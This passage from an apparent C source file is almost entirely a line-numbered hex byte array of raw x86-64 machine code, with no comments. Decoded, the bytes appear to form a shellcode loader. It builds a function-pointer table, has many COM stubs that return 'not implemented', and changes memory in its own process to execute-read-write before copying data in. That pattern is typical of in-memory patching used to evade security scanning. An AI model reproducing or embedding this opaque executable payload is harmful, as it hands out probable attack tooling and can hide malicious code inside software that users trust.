1835 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x37, 0x05, 0x00, 0x00, 0x48, 0x89,
1836 0x50, 0x48, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1837 0x48, 0x8d, 0x15, 0x35, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
1838 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1839 0x33, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x85, 0xc8,
1840 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00,
1841 0x00, 0x48, 0x89, 0x50, 0x60, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1842 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x31, 0x05, 0x00, 0x00, 0x48, 0x89,
1843 0x50, 0x68, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1844 0x48, 0x8d, 0x15, 0x64, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
1845 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1846 0x62, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x85, 0xc8,
1847 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x60, 0x05, 0x00,
1848 0x00, 0x48, 0x89, 0x90, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1849 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5b, 0x05, 0x00,
1850 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1851 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1852 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1853 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1854 0x00, 0x48, 0x89, 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1855 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1856 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1857 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x46, 0x05, 0x00,
1858 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1859 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x49, 0x05, 0x00,
1860 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1861 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x44, 0x05, 0x00,
1862 0x00, 0x48, 0x89, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1863 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x47, 0x05, 0x00,
1864 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1865 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x42, 0x05, 0x00,
1866 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1867 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x05, 0x00,
1868 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1869 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x05, 0x00,
1870 0x00, 0x48, 0x89, 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1871 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x51, 0x05, 0x00,
1872 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1873 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4c, 0x05, 0x00,
1874 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8,
1875 0x01, 0x00, 0x00, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1876 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00,
1877 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
1878 0x05, 0xed, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x49, 0x89, 0xd0,
1879 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0xe8, 0x3e,
1880 0xb3, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x4c, 0x8b,
1881 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1882 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8d, 0x45, 0xa0, 0x48, 0x89, 0xc1, 0x41,
1883 0xff, 0xd0, 0x89, 0x85, 0xac, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x01,
1884 0x00, 0x00, 0x00, 0x75, 0x45, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1885 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x30, 0x48,
1886 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x10, 0x48, 0x8b,
1887 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x94, 0x08, 0x00, 0x00,
1888 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x49,
1889 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xac, 0x01,
1890 0x00, 0x00, 0x8b, 0x85, 0xac, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30,
1891 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1892 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1893 0x20, 0x48, 0x83, 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00,
1894 0x80, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1895 0x40, 0x28, 0x48, 0x8d, 0x88, 0x04, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45,
1896 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x51,
1897 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48,
1898 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x14, 0x08, 0x00, 0x00, 0x48, 0x8b,
1899 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1900 0x2c, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10,
1901 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8d, 0x88, 0x94, 0x08, 0x00, 0x00, 0x48,
1902 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2,
1903 0xe8, 0x07, 0x0c, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45,
1904 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00,
1905 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
1906 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d,
1907 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
1908 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45,
1909 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f,
1910 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4,
1911 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1912 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48,
1913 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00,
1914 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8,
1915 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
1916 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1917 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
1918 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1919 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1920 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89,
1921 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75,
1922 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10,
1923 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48,
1924 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1925 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28,
1926 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20,
1927 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1928 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89,
1929 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
1930 0x00, 0x4c, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1931 0x10, 0x4c, 0x8b, 0x45, 0x38, 0x8b, 0x4d, 0x28, 0x48, 0x8b, 0x55, 0x20,
1932 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
1933 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1934 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
1935 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
1936 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c,
1937 0x8b, 0x50, 0x58, 0x44, 0x0f, 0xb7, 0x45, 0xec, 0x48, 0x8b, 0x45, 0x10,
1938 0x48, 0x8b, 0x40, 0x10, 0x8b, 0x4d, 0x18, 0x48, 0x8b, 0x55, 0x50, 0x48,
1939 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54, 0x24,
1940 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8b,
1941 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x41, 0x89,
1942 0xc8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
1943 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55,
1944 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1945 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1946 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1947 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1948 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1949 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1950 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1951 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1952 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66, 0x89, 0x45, 0x18,
1953 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1954 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b,
1955 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50,
1956 0x70, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x41, 0xb9, 0x00,
1957 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0xfd, 0xff,
1958 0xff, 0xff, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0xb8, 0x00, 0x00, 0x00,
1959 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1960 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1961 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1962 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1963 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1964 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1965 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1966 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1967 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1968 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1969 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18,
1970 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1971 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c,
1972 0x89, 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1973 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1974 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1975 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
1976 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1977 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1978 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48,
1979 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1980 0x40, 0x28, 0x48, 0x8b, 0x50, 0x58, 0x8b, 0x45, 0x18, 0x89, 0xc1, 0xff,
1981 0xd2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
1982 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1983 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
1984 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
1985 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1986 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1987 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1988 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1989 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
1990 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00,
1991 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1992 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf,
1993 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1994 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1995 0x48, 0x8b, 0x45, 0x30, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1996 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1997 0x89, 0x55, 0x18, 0x8b, 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d,
1998 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d,
1999 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
2000 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x28, 0x03,
2001 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0xd8, 0xb1,
2002 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75,
2003 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xfe, 0x01, 0x00, 0x00, 0x48,
2004 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0x9c, 0x05, 0x00, 0x00, 0x48, 0x8b,
2005 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
2006 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9b, 0xae, 0xff, 0xff, 0x48,
2007 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00,
2008 0x00, 0x00, 0x00, 0xe9, 0xc5, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x05, 0x2e,
2009 0xff, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x02, 0xff, 0xff, 0xff, 0x48, 0x29,
2010 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79, 0x0a, 0xb8,
2011 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
2012 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89, 0x45, 0xd0,
2013 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8,
2014 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48, 0x89, 0x54,
2015 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48,
2016 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1f, 0x0e,
2017 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79, 0x0a, 0xb8,
2018 0x00, 0x00, 0x00, 0x00, 0xe9, 0x4c, 0x01, 0x00, 0x00, 0x8b, 0x55, 0xe4,
2019 0x48, 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x86, 0xfe,
2020 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x32, 0x06, 0x00, 0x00, 0x44, 0x8b,
2021 0x45, 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2022 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48,
2023 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
2024 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc0, 0x0d, 0x00,
2025 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8d, 0x90, 0xac, 0x05, 0x00, 0x00,
2026 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89,
2027 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x9d, 0xad, 0xff,
2028 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a,
2029 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc7, 0x00, 0x00, 0x00, 0x48, 0x8d,
2030 0x05, 0x68, 0xfe, 0xff, 0xff, 0x48, 0x8d, 0x15, 0x3c, 0xfe, 0xff, 0xff,
2031 0x48, 0x29, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x85, 0xc0, 0x79,
2032 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa2, 0x00, 0x00, 0x00, 0x48,
2033 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xe4, 0x48, 0x89,
2034 0x45, 0xd0, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b,
2035 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xdc, 0x48,
2036 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89,
2037 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
2038 0x21, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x79,
2039 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x51, 0x8b, 0x55, 0xe4, 0x48,
2040 0x8b, 0x45, 0xe8, 0x41, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfd, 0xff,
2041 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x37, 0x05, 0x00, 0x00, 0x44, 0x8b, 0x45,
2042 0xdc, 0x48, 0x8d, 0x4d, 0xd0, 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55,
2043 0xf8, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x55, 0xd8, 0x48, 0x89,
2044 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
2045 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc5, 0x0c, 0x00, 0x00,
2046 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55,
2047 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x01, 0x00, 0x00, 0x00,
2048 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89,
2049 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
2050 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x3c,
2051 0x03, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x7f,
2052 0xaf, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48,
2053 0x8d, 0x90, 0xbc, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x41, 0xb9,
2054 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
2055 0x4d, 0x10, 0xe8, 0x53, 0xac, 0xff, 0xff, 0x48, 0x89, 0x45, 0xe8, 0x48,
2056 0x83, 0x7d, 0xe8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
2057 0xa7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x45, 0xc8,
2058 0x48, 0xc7, 0x45, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xd0,
2059 0x48, 0x8d, 0x45, 0xc8, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24,
2060 0x28, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
